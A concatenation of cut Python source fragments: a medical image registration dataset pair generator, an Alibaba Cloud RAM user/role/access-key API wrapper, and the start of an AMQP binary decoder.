typeclass = typeclass.apply_parameters(keysubtype, valsubtype)
return typeclass
@staticmethod
def | |
<filename>data_pre/reg_data_pool.py
from __future__ import print_function
import progressbar as pb
from easyreg.reg_data_utils import *
from data_pre.reg_preprocess_example.oasis_longitude_reg import *
import copy
sesses = ['train', 'val', 'test', 'debug']
number_of_workers = 10
warning_once = True
class BaseRegDataSet(object):
def __init__(self, dataset_type, sched=None):
"""
:param name: name of data set
:param dataset_type: ''mixed' like oasis including inter and intra person or 'custom' like LPBA40, only includes inter person
:param file_type_list: the file types to be filtered, like [*1_a.bmp, *2_a.bmp]
:param data_path: path of the dataset
"""
self.data_path = None
"""path of the dataset"""
self.output_path = None
"""path of the output directory"""
self.pro_data_path = None
self.pair_name_list = []
self.pair_path_list = []
self.file_type_list = None
self.max_used_train_samples = -1
self.max_pairs = -1
self.sever_switch = None
self.save_format = 'h5py'
"""currently only support h5py"""
self.sched = sched
"""inter or intra, for inter-personal or intra-personal registration"""
self.dataset_type = dataset_type
"""custom or mixed"""
self.saving_h5py=False
"""if true, save the preprocessed results as h5py"""
self.normalize= False
""" settings for normalization, currently not used"""
self.divided_ratio = (0.7, 0.1, 0.2)
"""divided the data into train, val, test set"""
def generate_pair_list(self):
pass
def set_data_path(self, path):
self.data_path = path
def set_label_path(self, path):
self.label_path = path
def set_output_path(self, path):
self.output_path = path
make_dir(path)
def set_divided_ratio(self,ratio):
self.divided_ratio = ratio
def get_file_num(self):
return len(self.pair_path_list)
def get_pair_name_list(self):
return self.pair_name_list
def save_pair_to_txt(self,info=None):
pass
def gen_pair_dic(self):
pass
def prepare_data(self):
"""
preprocessig data for each dataset
:return:
"""
print("starting preapare data..........")
print("the output file path is: {}".format(self.output_path))
info=self.gen_pair_dic()
self.save_pair_to_txt(copy.deepcopy(info))
print("data preprocessing finished")
class CustomDataSet(BaseRegDataSet):
"""
This class only compatible with dataset_type "mixed" and "custom"
unlabeled dataset
"""
def __init__(self,dataset_type, sched=None):
BaseRegDataSet.__init__(self,dataset_type,sched)
self.aug_test_for_seg_task = False
self.reg_coupled_pair = False
self.coupled_pair_list = []
self.find_corr_label = find_corr_map
self.label_switch = ('', '')
self.label_path = None
def __gen_path_and_name_dic(self, pair_list_dic):
divided_path_and_name_dic = {}
divided_path_and_name_dic['pair_path_list'] = pair_list_dic
divided_path_and_name_dic['pair_name_list'] = self.__gen_pair_name_list(pair_list_dic)
return divided_path_and_name_dic
def __gen_pair_name_list(self, pair_list_dic):
return {sess: [generate_pair_name([path[0],path[1]]) for path in pair_list_dic[sess]] for sess
in sesses}
def __gen_pair_list(self,img_path_list, pair_num_limit = 1000):
img_pair_list = []
label_path_list = self.find_corr_label(img_path_list, self.label_path, self.label_switch)
num_img = len(img_path_list)
for i in range(num_img):
count_max=15 #15
img_pair_list_tmp =[]
for j in range(num_img):
if i!=j:
if self.label_path is not None:
img_pair_list_tmp.append([img_path_list[i],img_path_list[j],
label_path_list[i],label_path_list[j]])
else:
img_pair_list_tmp.append([img_path_list[i], img_path_list[j]])
if len(img_pair_list_tmp)>count_max:
img_pair_list_tmp= random.sample(img_pair_list_tmp,count_max)
img_pair_list += img_pair_list_tmp
if pair_num_limit >= 0:
random.shuffle(img_pair_list)
return img_pair_list[:pair_num_limit]
else:
return img_pair_list
def __gen_pair_list_from_two_list(self,img_path_list_1, img_path_list_2, pair_num_limit = 1000):
img_pair_list = []
label_path_list_1 = self.find_corr_label(img_path_list_1, self.label_path, self.label_switch)
label_path_list_2 = self.find_corr_label(img_path_list_2, self.label_path, self.label_switch)
num_img_1 = len(img_path_list_1)
num_img_2 = len(img_path_list_2)
for i in range(num_img_1):
count_max=15 #15
img_pair_list_tmp =[]
for j in range(num_img_2):
if self.label_path is not None:
img_pair_list_tmp.append([img_path_list_1[i],img_path_list_2[j],
label_path_list_1[i],label_path_list_2[j]])
else:
img_pair_list_tmp.append([img_path_list_1[i], img_path_list_2[j]])
if len(img_pair_list_tmp)>count_max:
img_pair_list_tmp= random.sample(img_pair_list_tmp,count_max)
img_pair_list += img_pair_list_tmp
if pair_num_limit >= 0:
random.shuffle(img_pair_list)
return img_pair_list[:pair_num_limit]
else:
return img_pair_list
def __gen_pair_list_with_coupled_list(self,pair_path_list, pair_num_limit = 1000):
img_pair_list = []
img_path_list_1 = [pair_path[0] for pair_path in pair_path_list]
img_path_list_2 = [pair_path[1] for pair_path in pair_path_list]
label_path_list_1 = self.find_corr_label(img_path_list_1, self.label_path, self.label_switch)
label_path_list_2 = self.find_corr_label(img_path_list_2, self.label_path, self.label_switch)
has_label = [os.path.exists(p1) and os.path.exists(p2) for p1, p2 in zip(label_path_list_1,label_path_list_2)]
num_img_1 = len(img_path_list_1)
num_img_2 = len(img_path_list_2)
assert num_img_1 == num_img_2
for i in range(num_img_1):
if has_label[i]:
img_pair_list.append([img_path_list_1[i],img_path_list_2[i],
label_path_list_1[i],label_path_list_2[i]])
else:
img_pair_list.append([img_path_list_1[i], img_path_list_2[i]])
if pair_num_limit >= 0:
random.shuffle(img_pair_list)
return img_pair_list[:pair_num_limit]
else:
return img_pair_list
def __gen_across_file_pair_dic(self):
num_pair_limit = self.max_pairs # -1
img_path_list = get_file_path_list(self.data_path, self.file_type_list)
if self.sever_switch is not None:
img_path_list = [img_path.replace(self.sever_switch[0], self.sever_switch[1]) for img_path in img_path_list]
sub_folder_dic, sub_patients_dic = self.__divide_into_train_val_test_set(self.output_path, img_path_list,
self.divided_ratio)
gen_pair_list_func = self.__gen_pair_list
max_ratio = {'train': self.divided_ratio[0], 'val': self.divided_ratio[1], 'test': self.divided_ratio[2],
'debug': self.divided_ratio[1]}
if self.max_used_train_samples>-1:
sub_patients_dic['train'] = sub_patients_dic['train'][:self.max_used_train_samples]
if not self.aug_test_for_seg_task:
pair_list_dic = {sess: gen_pair_list_func(sub_patients_dic[sess], int(
num_pair_limit * max_ratio[sess]) if num_pair_limit > 0 else -1) for
sess in sesses}
else:
pair_list_dic = {sess: gen_pair_list_func(sub_patients_dic[sess], int(
num_pair_limit * max_ratio[sess]) if num_pair_limit > 0 else -1) for
sess in ['train', 'val', 'debug']}
pair_list_dic['test'] = self.__gen_pair_list_from_two_list(sub_patients_dic['test'],
sub_patients_dic['train'][:10],
int(num_pair_limit * max_ratio[
"test"]) if num_pair_limit > 0 else -1)
divided_path_and_name_dic = self.__gen_path_and_name_dic(pair_list_dic)
return (sub_folder_dic, divided_path_and_name_dic)
def __gen_pair_dic_with_given_pair(self):
num_pair_limit = self.max_pairs # -1
pair_path_list =self.coupled_pair_list
if self.sever_switch is not None:
pair_path_list = [[img_path.replace(self.sever_switch[0], self.sever_switch[1]) for img_path in pair_path] for pair_path in pair_path_list]
sub_folder_dic, sub_patients_dic = self.__divide_into_train_val_test_set(self.output_path, pair_path_list,
self.divided_ratio)
gen_pair_list_func = self.__gen_pair_list_with_coupled_list
max_ratio = {'train': self.divided_ratio[0], 'val': self.divided_ratio[1], 'test': self.divided_ratio[2],
'debug': self.divided_ratio[1]}
if self.max_used_train_samples > -1:
sub_patients_dic['train'] = sub_patients_dic['train'][:self.max_used_train_samples]
pair_list_dic = {sess: gen_pair_list_func(sub_patients_dic[sess], int(
num_pair_limit * max_ratio[sess]) if num_pair_limit > 0 else -1) for
sess in sesses}
divided_path_and_name_dic = self.__gen_path_and_name_dic(pair_list_dic)
return (sub_folder_dic, divided_path_and_name_dic)
def gen_pair_dic(self):
if not self.reg_coupled_pair:
return self.__gen_across_file_pair_dic()
else:
return self.__gen_pair_dic_with_given_pair()
def __divide_into_train_val_test_set(self,root_path, img_path_list, ratio):
num_img = len(img_path_list)
train_ratio = ratio[0]
val_ratio = ratio[1]
sub_path = {x: os.path.join(root_path, x) for x in ['train', 'val', 'test', 'debug']}
nt = [make_dir(sub_path[key]) for key in sub_path]
if sum(nt):
raise ValueError("the data has already exist, due to randomly assignment schedule, the program block\n"
"manually delete the folder to reprepare the data")
train_num = int(train_ratio * num_img)
val_num = int(val_ratio * num_img)
sub_patients_dic = {}
sub_patients_dic['train'] = img_path_list[:train_num]
sub_patients_dic['val'] = img_path_list[train_num: train_num + val_num]
sub_patients_dic['test'] = img_path_list[train_num + val_num:]
sub_patients_dic['debug'] = img_path_list[: val_num]
return sub_path,sub_patients_dic
def save_pair_to_txt(self, info=None):
sub_folder_dic, divided_path_and_name_dic = info
saving_pair_info(sub_folder_dic, divided_path_and_name_dic)
class PatientStructureDataSet(BaseRegDataSet):
"""
The data in self.data_root_path would be loaded,
"""
def __init__(self, dataset_type, sched):
BaseRegDataSet.__init__(self, dataset_type,sched)
self.patients = []
self.only_test_set=False
"""all available data would be regarded as test data, no training and validation set would be generated"""
self.data_root_path = None
def initialize_info(self):
self.__init_patients()
def set_data_root_path(self,data_root_path):
self.data_root_path = data_root_path
def __init_patients(self):
if self.data_root_path is None:
if not self.only_test_set:
root_path ="/playpen/zyshen/summer/oai_registration/reg_0623/data"
else:
root_path ="/playpen/zyshen/summer/oai_registration/reg_0820/data"
else:
root_path = self.data_root_path
Patient_class = Patients(full_init=True, root_path=root_path)
self.patients= Patient_class.get_filtered_patients_list(has_complete_label=True, len_time_range=[1, 10], use_random=False)
print("total {} of paitents are selected".format(len(self.patients)))
def __divide_into_train_val_test_set(self,root_path, patients, ratio):
num_patient = len(patients)
train_ratio = ratio[0]
val_ratio = ratio[1]
sub_path = {x: os.path.join(root_path, x) for x in ['train', 'val', 'test', 'debug']}
nt = [make_dir(sub_path[key]) for key in sub_path]
if sum(nt):
raise ValueError("the data has already exist, due to randomly assignment schedule, the program block\n"
"manually delete the folder to reprepare the data")
train_num = int(train_ratio * num_patient)
val_num = int(val_ratio * num_patient)
sub_patients_dic = {}
sub_patients_dic['train'] = patients[:train_num]
sub_patients_dic['val'] = patients[train_num: train_num + val_num]
sub_patients_dic['test'] = patients[train_num + val_num:]
sub_patients_dic['debug'] = patients[: val_num]
return sub_path,sub_patients_dic
def __gen_intra_pair_list(self,patients, pair_num_limit = 1000):
intra_pair_list = []
for patient in patients:
for modality in patient.modality:
for specificity in patient.specificity:
intra_image_list = patient.get_slice_path_list(modality,specificity)
intra_label_list = patient.get_label_path_list(modality,specificity)
num_images = len(intra_image_list)
for i, image in enumerate(intra_image_list):
for j in range(i+1, num_images):
intra_pair_list.append([intra_image_list[i],intra_image_list[j],
intra_label_list[i],intra_label_list[j]])
# intra_pair_list.append([intra_image_list[j], intra_image_list[i], used in old code
# intra_label_list[j], intra_label_list[i]])
# if pair_num_limit>=0 and len(intra_pair_list)> 5*pair_num_limit:
# break
if pair_num_limit >= 0:
random.shuffle(intra_pair_list)
return intra_pair_list[:pair_num_limit]
else:
return intra_pair_list
def __gen_inter_pair_list(self, patients,pair_num_limit = 1000):
"""
here we only use the first time period for inter image registration
:param patients:
:param pair_num_limit:
:return:
"""
inter_pair_list = []
num_patients = len(patients)
if pair_num_limit==0:
return inter_pair_list
while True:
rand_pair_id = [int(num_patients * random.random()), int(num_patients * random.random())]
patient_a = patients[rand_pair_id[0]]
patient_b = patients[rand_pair_id[1]]
modality_list = patient_a.modality
specificity_list = patient_a.specificity
modality_id = int(len(modality_list)*random.random())
specificity_id = int(len(specificity_list)*random.random())
patient_a_slice = patient_a.get_slice_path_list(modality_list[modality_id],specificity_list[specificity_id])
patient_a_label = patient_a.get_label_path_list(modality_list[modality_id],specificity_list[specificity_id])
patient_b_slice = patient_b.get_slice_path_list(modality_list[modality_id],specificity_list[specificity_id])
patient_b_label = patient_b.get_label_path_list(modality_list[modality_id],specificity_list[specificity_id])
slice_id_a = int(len(patient_a_slice)*random.random())
slice_id_b = int(len(patient_b_slice)*random.random())
if modality_list[modality_id] in patient_b.modality:
if specificity_list[specificity_id] in patient_b.specificity:
pair = [patient_a_slice[slice_id_a], patient_b_slice[slice_id_b],
patient_a_label[slice_id_a], patient_b_label[slice_id_b]]
inter_pair_list.append(pair)
if len(inter_pair_list)> pair_num_limit:
break
return inter_pair_list
def __gen_path_and_name_dic(self, pair_list_dic):
divided_path_and_name_dic={}
divided_path_and_name_dic['pair_path_list'] = pair_list_dic
divided_path_and_name_dic['pair_name_list'] = self.__gen_pair_name_list(pair_list_dic)
return divided_path_and_name_dic
def __gen_pair_name_list(self,pair_list_dic):
return {sess:[generate_pair_name([path[0],path[1]]) for path in pair_list_dic[sess]] for sess in sesses}
def gen_pair_dic(self):
if self.only_test_set:
self.divided_ratio = [0.,0.,1.] ##############################################
num_pair_limit = 150 # -1 if self.sched=='intra' else 300 used in old code
else:
num_pair_limit = 2000 #-1 used in old code
sub_folder_dic, sub_patients_dic =self.__divide_into_train_val_test_set(self.output_path,self.patients,self.divided_ratio)
gen_pair_list_func = self. __gen_intra_pair_list if self.sched=='intra' else self.__gen_inter_pair_list
max_ratio = {'train':self.divided_ratio[0],'val':self.divided_ratio[1],'test':self.divided_ratio[2],'debug':self.divided_ratio[1]}
pair_list_dic ={sess: gen_pair_list_func(sub_patients_dic[sess],int(num_pair_limit*max_ratio[sess])) for sess in sesses}
divided_path_and_name_dic = self.__gen_path_and_name_dic(pair_list_dic)
return (sub_folder_dic,divided_path_and_name_dic)
def save_pair_to_txt(self,info=None):
sub_folder_dic, divided_path_and_name_dic = info
if not self.saving_h5py:
saving_pair_info(sub_folder_dic, divided_path_and_name_dic)
else:
for sess in sesses:
h5py_output_root_path = sub_folder_dic[sess]
pair_path_list = [[os.path.join(h5py_output_root_path,get_file_name(fps[i])+'.h5py') for i in [0,1]] for fps in divided_path_and_name_dic['pair_path_list'][sess]]
divided_path_and_name_dic['pair_path_list'][sess] = pair_path_list
saving_pair_info(sub_folder_dic, divided_path_and_name_dic)
def save_pair_to_h5py(self,info=None):
sub_folder_dic, divided_path_and_name_dic =info
for sess in sesses:
self.pro_data_path = sub_folder_dic[sess]
pair_path_list_part = np.array_split(divided_path_and_name_dic['pair_path_list'][sess],number_of_workers)
with Pool(processes=number_of_workers) as pool:
pool.map(self.save_file_to_h5py, pair_path_list_part)
def save_file_to_h5py(self,info=None):
file_path_list = info
pbar = pb.ProgressBar(widgets=[pb.Percentage(), pb.Bar(), pb.ETA()], maxval=len(file_path_list)).start()
for i, fps in enumerate(file_path_list):
for j | |
# encoding: utf-8
"""
Represents a connection to the RAM service.
"""
import six
from footmark.connection import ACSQueryConnection
from footmark.ram.group import Group
from footmark.ram.loginprofile import LoginProfile
from footmark.ram.mfadevice import MfaDevice
from footmark.ram.policy import Policy
from footmark.ram.policyversion import PolicyVersion
from footmark.ram.regioninfo import RegionInfo
from footmark.exception import RamResponseError
from footmark.ram.role import Role
from footmark.ram.user import User
from footmark.resultset import ResultSet
from footmark.ram.accesskey import AccessKey
class RAMConnection(ACSQueryConnection):
SDKVersion = '2015-05-01'
DefaultRegionId = 'cn-hangzhou'
DefaultRegionName = u'杭州'.encode("UTF-8")
RamResponseError = RamResponseError
def __init__(self, acs_access_key_id=None, acs_secret_access_key=None,
region=None, sdk_version=None, security_token=None, user_agent=None):
"""
Init method to create a new connection to RAM.
"""
if not region:
region = RegionInfo(self, self.DefaultRegionName,
self.DefaultRegionId)
self.region = region
if sdk_version:
self.SDKVersion = sdk_version
self.RAMSDK = 'aliyunsdkram.request.v' + self.SDKVersion.replace('-', '')
super(RAMConnection, self).__init__(acs_access_key_id,
acs_secret_access_key,
self.region, self.RAMSDK, security_token, user_agent=user_agent)
def create_access_key(self, user_name):
"""
add access_key for user
:type user_name: str
:param user_name: the name of user
:rtype: object
:return: Returns a <footmark.ram.accesskey> object.
"""
params = {}
self.build_list_params(params, user_name, 'UserName')
return self.get_object('CreateAccessKey', params, AccessKey)
def update_access_key(self, user_name, access_key_id, is_active=None):
"""
update access_key for user
:type user_name: str
:param user_name: the name of user
:type is_active: bool
:param is_active: the status of accesskey
:rtype: bool
:return: The result of update access_key.
"""
params = {}
self.build_list_params(params, user_name, 'UserName')
self.build_list_params(params, access_key_id, 'UserAccessKeyId')
if is_active is True:
self.build_list_params(params, 'Active', 'Status')
else:
self.build_list_params(params, 'Inactive', 'Status')
return self.get_status('UpdateAccessKey', params)
def delete_access_key(self, user_name, access_key_id):
"""
delete access_key of user
:type user_name: str
:param user_name: the name of user
:type access_key_id: str
:param access_key_id: The access_key to delete
:rtype: bool
:return: The result of deleting access_key.
"""
params = {}
self.build_list_params(params, user_name, 'UserName')
self.build_list_params(params, access_key_id, 'UserAccessKeyId')
return self.get_status('DeleteAccessKey', params)
def list_access_keys(self, user_name):
"""
Retrieve all the access_key associated with your account.
:type user_name: str
:param user_name: User name of access_key
:rtype: list
:return: A list of :class:`footmark.ram.accesskey`
"""
params = {}
if user_name:
self.build_list_params(params, user_name, 'UserName')
return self.get_list('ListAccessKeys', params, ['AccessKeys', AccessKey])
def create_user(self, user_name, display_name=None, phone=None, email=None, comments=None):
"""
create user
:type user_name: str
:param user_name: The name of user
:type display_name: str
:param display_name: The display name of user
:type phone: str
:param phone: The phone of user
:type email: str
:param email: The email of user
:type comments: str
:param comments: The comments about user
:rtype: object
:return: Returns a <footmark.ram.user> object.
"""
params = {}
self.build_list_params(params, user_name, 'UserName')
if display_name:
self.build_list_params(params, display_name, 'DisplayName')
if phone:
self.build_list_params(params, phone, 'MobilePhone')
if email:
self.build_list_params(params, email, 'Email')
if comments:
self.build_list_params(params, comments, 'Comments')
return self.get_object('CreateUser', params, User)
def get_user(self, user_name):
"""
get user
:type user_name: str
:param user_name: The name of user
:rtype: object
:return: Returns a <footmark.ram.user> object.
"""
params = {}
self.build_list_params(params, user_name, 'UserName')
return self.get_object('GetUser', params, User)
def update_user(self, user_name, new_display_name=None, new_user_name=None, new_phone=None, new_email=None, new_comments=None):
"""
update user's info
:type user_name: str
:param user_name: The name of user
:type new_user_name: str
:param new_user_name: The new name of user
:type new_display_name: str
:param new_display_name: The new display name of user
:type new_phone: str
:param new_phone: The new phone of user
:type new_email: str
:param new_email: The new email of user
:type new_comments: str
:param new_comments: The new comments about user
:rtype: bool
:return: The result of update user.
"""
params = {}
self.build_list_params(params, user_name, 'UserName')
if new_user_name:
self.build_list_params(params, new_user_name, 'NewUserName')
if new_display_name:
self.build_list_params(params, new_display_name, 'NewDisplayName')
if new_phone:
self.build_list_params(params, new_phone, 'NewMobilePhone')
if new_email:
self.build_list_params(params, new_email, 'NewEmail')
if new_comments:
self.build_list_params(params, new_comments, 'NewComments')
return self.get_status('UpdateUser', params)
def list_user(self):
"""
Retrieve all the users associated with your account.
:rtype: list
:return: A list of :class:`footmark.ram.user`
"""
return self.get_list('ListUsers', None, ['Users', User])
def delete_user(self, user_name):
"""
delete user
:type user_name: str
:param user_name: the name of user
:rtype: bool
:return: The result of deleting user.
"""
params = {}
self.build_list_params(params, user_name, 'UserName')
return self.get_status('DeleteUser', params)
def create_role(self, role_name, policy_doc, description=None):
"""
create role
:type role_name: str
:param role_name: The name of role
:type policy_doc: str
:param policy_doc: The policy document to assume role
:type description: str
:param description: The description of role
:rtype: object
:return: Returns a <footmark.ram.role> object.
"""
params = {}
self.build_list_params(params, role_name, 'RoleName')
self.build_list_params(params, policy_doc, 'AssumeRolePolicyDocument')
if description:
self.build_list_params(params, description, 'Description')
return self.get_object('CreateRole', params, Role)
def get_role(self, role_name):
"""
get role
:type role_name: str
:param role_name: The name of role
:rtype: object
:return: Returns a <footmark.ram.role> object.
"""
params = {}
self.build_list_params(params, role_name, 'RoleName')
return self.get_object('GetRole', params, Role)
def update_role(self, role_name, new_policy_doc=None):
"""
update role's info
:type role_name: str
:param user_name: The name of role
:type new_policy_doc: str
:param new_policy_doc: The new policy of role
:rtype: bool
:return: The result of update role.
"""
params = {}
self.build_list_params(params, role_name, 'RoleName')
if new_policy_doc:
self.build_list_params(params, new_policy_doc, 'NewAssumeRolePolicyDocument')
return self.get_status('UpdateRole', params)
def list_role(self):
"""
Retrieve all the role associated with your account.
:rtype: list
:return: A list of :class:`footmark.ram.role`
"""
return self.get_list('ListRoles', None, ['Roles', Role])
def delete_role(self, role_name):
"""
delete role
:type role_name: str
:param role_name: the name of role
:rtype: bool
:return: The result of deleting role.
"""
params = {}
self.build_list_params(params, role_name, 'RoleName')
return self.get_status('DeleteRole', params)
def create_group(self, group_name, comments=None):
"""
create group
:type group_name: str
:param group_name: The name of group
:type comments: str
:param comments: The description of group
:rtype: object
:return: Returns a <footmark.ram.group> object.
"""
params = {}
self.build_list_params(params, group_name, 'GroupName')
if comments:
self.build_list_params(params, comments, 'Comments')
return self.get_object('CreateGroup', params, Group)
def get_group(self, group_name):
"""
get group
:type group_name: str
:param group_name: The name of group
:rtype: object
:return: Returns a <footmark.ram.role> object.
"""
params = {}
self.build_list_params(params, group_name, 'GroupName')
return self.get_object('GetGroup', params, Group)
def update_group(self, group_name, new_group_name=None, new_comments=None):
"""
update group's info
:type group_name: str
:param group_name: The name of group
:type new_group_name: str
:param new_group_name: The new name of group
:type new_comments: str
:param new_comments: The new comments of group
:rtype: bool
:return: The result of update group.
"""
params = {}
self.build_list_params(params, group_name, 'GroupName')
if new_group_name:
self.build_list_params(params, new_group_name, 'NewGroupName')
if new_comments:
self.build_list_params(params, new_comments, 'NewComments')
return self.get_status('UpdateGroup', params)
def list_group(self):
"""
Retrieve all the group associated with your account.
:rtype: list
:return: A list of :class:`footmark.ram.group`
"""
return self.get_list('ListGroups', None, ['Groups', Group])
def delete_group(self, group_name):
"""
delete group
:type group_name: str
:param group_name: the name of group
:rtype: bool
:return: The result of deleting group.
"""
params = {}
self.build_list_params(params, group_name, 'GroupName')
return self.get_status('DeleteGroup', params)
def create_login_profile(self, user_name, pwd, pwd_reset_req=None, mfa_req=None):
"""
create login_profile
:type user_name: str
:param user_name: The name of user
:type pwd: str
:param pwd: <PASSWORD> <PASSWORD>
:type pwd_reset_req: bool
:param pwd_reset_req: Whether to enable user reset password,the default value is false.
:type mfa_req: bool
:param mfa_req: Whether to enable user bind mfa,the default value is false.
:rtype: object
:return: Returns a <footmark.ram.loginprofile> object.
"""
params = {}
self.build_list_params(params, user_name, 'UserName')
self.build_list_params(params, pwd, 'Password')
if pwd_reset_req is False or pwd_reset_req is None:
self.build_list_params(params, False, 'PasswordResetRequired')
if mfa_req is False or mfa_req is None:
self.build_list_params(params, False, 'MFABindRequired')
return self.get_object('CreateLoginProfile', params, LoginProfile)
def get_login_profile(self, user_name):
"""
get login_profile
:type user_name: str
:param user_name: The name of user
:rtype: object
:return: Returns a <footmark.ram.loginprofile> object.
"""
params = {}
self.build_list_params(params, user_name, 'UserName')
return self.get_object('GetLoginProfile', params, LoginProfile)
def update_login_profile(self, user_name, pwd=None, pwd_reset_req=None, mfa_req=None):
"""
update login_profile's info
:type user_name: str
:param user_name: The name of user
:type pwd: str
:param pwd: The <PASSWORD> user
:type pwd_reset_req: bool
:param pwd_reset_req: Whether to enable user reset password,the default value is false.
:type mfa_req: bool
:param mfa_req: Whether to enable user bind mfa,the default value is false.
:rtype: bool
:return: The result of update group.
"""
params = {}
self.build_list_params(params, user_name, 'UserName')
if pwd:
self.build_list_params(params, pwd, 'Password')
if pwd_reset_req is not None:
self.build_list_params(params, pwd_reset_req, 'PasswordResetRequired')
if mfa_req is not None:
self.build_list_params(params, mfa_req, 'MFABindRequired')
return self.get_status('UpdateLoginProfile', params)
def delete_login_profile(self, user_name):
"""
delete login_profile
:type user_name: str
:param user_name: the name of user
:rtype: bool
:return: The result of deleting login_profile of user.
"""
params = {}
self.build_list_params(params, user_name, 'UserName')
return self.get_status('DeleteLoginProfile', params)
def create_mfa_device(self, mfa_name):
"""
create mfa_device
:type mfa_name: str
| |
<gh_stars>1-10
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
# pylint: disable=redefined-builtin
import struct
import uuid
from io import BytesIO
import logging
from typing import Iterable, Union, Tuple, Dict # pylint: disable=unused-import
from pyamqp1.amqptypes import FieldDefinition, ObjDefinition, ConstructorBytes
from pyamqp1.definitions import _FIELD_DEFINITIONS
from pyamqp1.error import AMQPError
from pyamqp1.performatives import (
Performative,
HeaderFrame,
TLSHeaderFrame,
SASLHeaderFrame,
OpenFrame,
BeginFrame,
AttachFrame,
FlowFrame,
TransferFrame,
DispositionFrame,
DetachFrame,
EndFrame,
CloseFrame,
SASLMechanism,
SASLInit,
SASLChallenge,
SASLResponse,
SASLOutcome)
from pyamqp1.endpoints import Source, Target
from pyamqp1.message import AnnotatedMessage, Header, Properties
from pyamqp1.outcomes import (
Received,
Accepted,
Rejected,
Released,
Modified,
)
_LOGGER = logging.getLogger(__name__)
_MESSAGE_PERFORMATIVES = [Header, Properties]
PERFORMATIVES = {
0x00000010: OpenFrame,
0x00000011: BeginFrame,
0x00000012: AttachFrame,
0x00000013: FlowFrame,
0x00000014: TransferFrame,
0x00000015: DispositionFrame,
0x00000016: DetachFrame,
0x00000017: EndFrame,
0x00000018: CloseFrame,
0x00000040: SASLMechanism,
0x00000041: SASLInit,
0x00000042: SASLChallenge,
0x00000043: SASLResponse,
0x00000044: SASLOutcome
}
COMPOSITES = {
0x00000023: Received,
0x00000024: Accepted,
0x00000025: Rejected,
0x00000026: Released,
0x00000027: Modified,
0x00000028: Source,
0x00000029: Target,
0x0000001d: AMQPError,
}
class DecoderState(object): # pylint: disable=no-init
constructor = 'CONSTRUCTOR'
type_data = 'TYPE_DATA'
done = 'DONE'
class Decoder(object):
def __init__(self, length):
self.state = DecoderState.constructor
self.bytes_remaining = length
self.decoded_value = {}
self.constructor_byte = None
def still_working(self):
if self.bytes_remaining is None:
return self.state != DecoderState.done
return self.bytes_remaining > 0
def progress(self, num_bytes):
if self.bytes_remaining is None:
return
if self.bytes_remaining - num_bytes < 0:
raise ValueError("Buffer bytes exhausted.")
self.bytes_remaining -= num_bytes
def decode_constructor(decoder):
# type: (Decoder) -> None
if decoder.constructor_byte == ConstructorBytes.null:
decoder.decoded_value = None
decoder.state = DecoderState.done
elif decoder.constructor_byte == ConstructorBytes.bool_true:
decoder.decoded_value = True
decoder.state = DecoderState.done
elif decoder.constructor_byte == ConstructorBytes.bool_false:
decoder.decoded_value = False
decoder.state = DecoderState.done
elif decoder.constructor_byte in [ConstructorBytes.uint_0, ConstructorBytes.ulong_0]:
decoder.decoded_value = 0
decoder.state = DecoderState.done
else:
decoder.state = DecoderState.type_data
def _read(buffer, size):
# type: (IO, int) -> bytes
data = buffer.read(size)
if data == b'' or len(data) != size:
raise ValueError("Buffer exhausted. Read {}, Length: {}".format(data, len(data)))
return data
def decode_boolean(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 1)
if data == b'\x00':
decoder.decoded_value = False
elif data == b'\x01':
decoder.decoded_value = True
else:
raise ValueError("Invalid boolean value: {}".format(data))
decoder.progress(1)
decoder.state = DecoderState.done
def decode_ubyte(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 1)
try:
decoder.decoded_value = struct.unpack('>B', data)[0]
except Exception:
raise ValueError("Invalid ubyte value: {}".format(data))
decoder.progress(1)
decoder.state = DecoderState.done
def decode_ushort(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 2)
try:
decoder.decoded_value = struct.unpack('>H', data)[0]
except Exception:
raise ValueError("Invalid ushort value: {}".format(data))
decoder.progress(2)
decoder.state = DecoderState.done
def decode_uint_small(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 1)
try:
decoder.decoded_value = struct.unpack('>B', data)[0]
except Exception:
raise ValueError("Invalid uint value: {}".format(data))
decoder.progress(1)
decoder.state = DecoderState.done
def decode_uint_large(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 4)
try:
decoder.decoded_value = struct.unpack('>I', data)[0]
except Exception:
raise ValueError("Invalid uint value: {}".format(data))
decoder.progress(4)
decoder.state = DecoderState.done
def decode_ulong_small(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 1)
try:
decoder.decoded_value = struct.unpack('>B', data)[0]
except Exception:
raise ValueError("Invalid ulong value: {}".format(data))
decoder.progress(1)
decoder.state = DecoderState.done
def decode_ulong_large(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 8)
try:
decoder.decoded_value = struct.unpack('>Q', data)[0]
except Exception:
raise ValueError("Invalid ulong value: {}".format(data))
decoder.progress(8)
decoder.state = DecoderState.done
def decode_byte(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 1)
try:
decoder.decoded_value = struct.unpack('>b', data)[0]
except Exception:
raise ValueError("Invalid byte value: {}".format(data))
decoder.progress(1)
decoder.state = DecoderState.done
def decode_short(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 2)
try:
decoder.decoded_value = struct.unpack('>h', data)[0]
except Exception:
raise ValueError("Invalid short value: {}".format(data))
decoder.progress(2)
decoder.state = DecoderState.done
def decode_int_small(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 1)
try:
decoder.decoded_value = struct.unpack('>b', data)[0]
except Exception:
raise ValueError("Invalid int value: {}".format(data))
decoder.progress(1)
decoder.state = DecoderState.done
def decode_int_large(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 4)
try:
decoder.decoded_value = struct.unpack('>i', data)[0]
except Exception:
raise ValueError("Invalid int value: {}".format(data))
decoder.progress(4)
decoder.state = DecoderState.done
def decode_long_small(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 1)
try:
decoder.decoded_value = struct.unpack('>b', data)[0]
except Exception:
raise ValueError("Invalid long value: {}".format(data))
decoder.progress(1)
decoder.state = DecoderState.done
def decode_long_large(decoder, buffer):
# type: (Decoder, IO) -> None
data = _read(buffer, 8)
try:
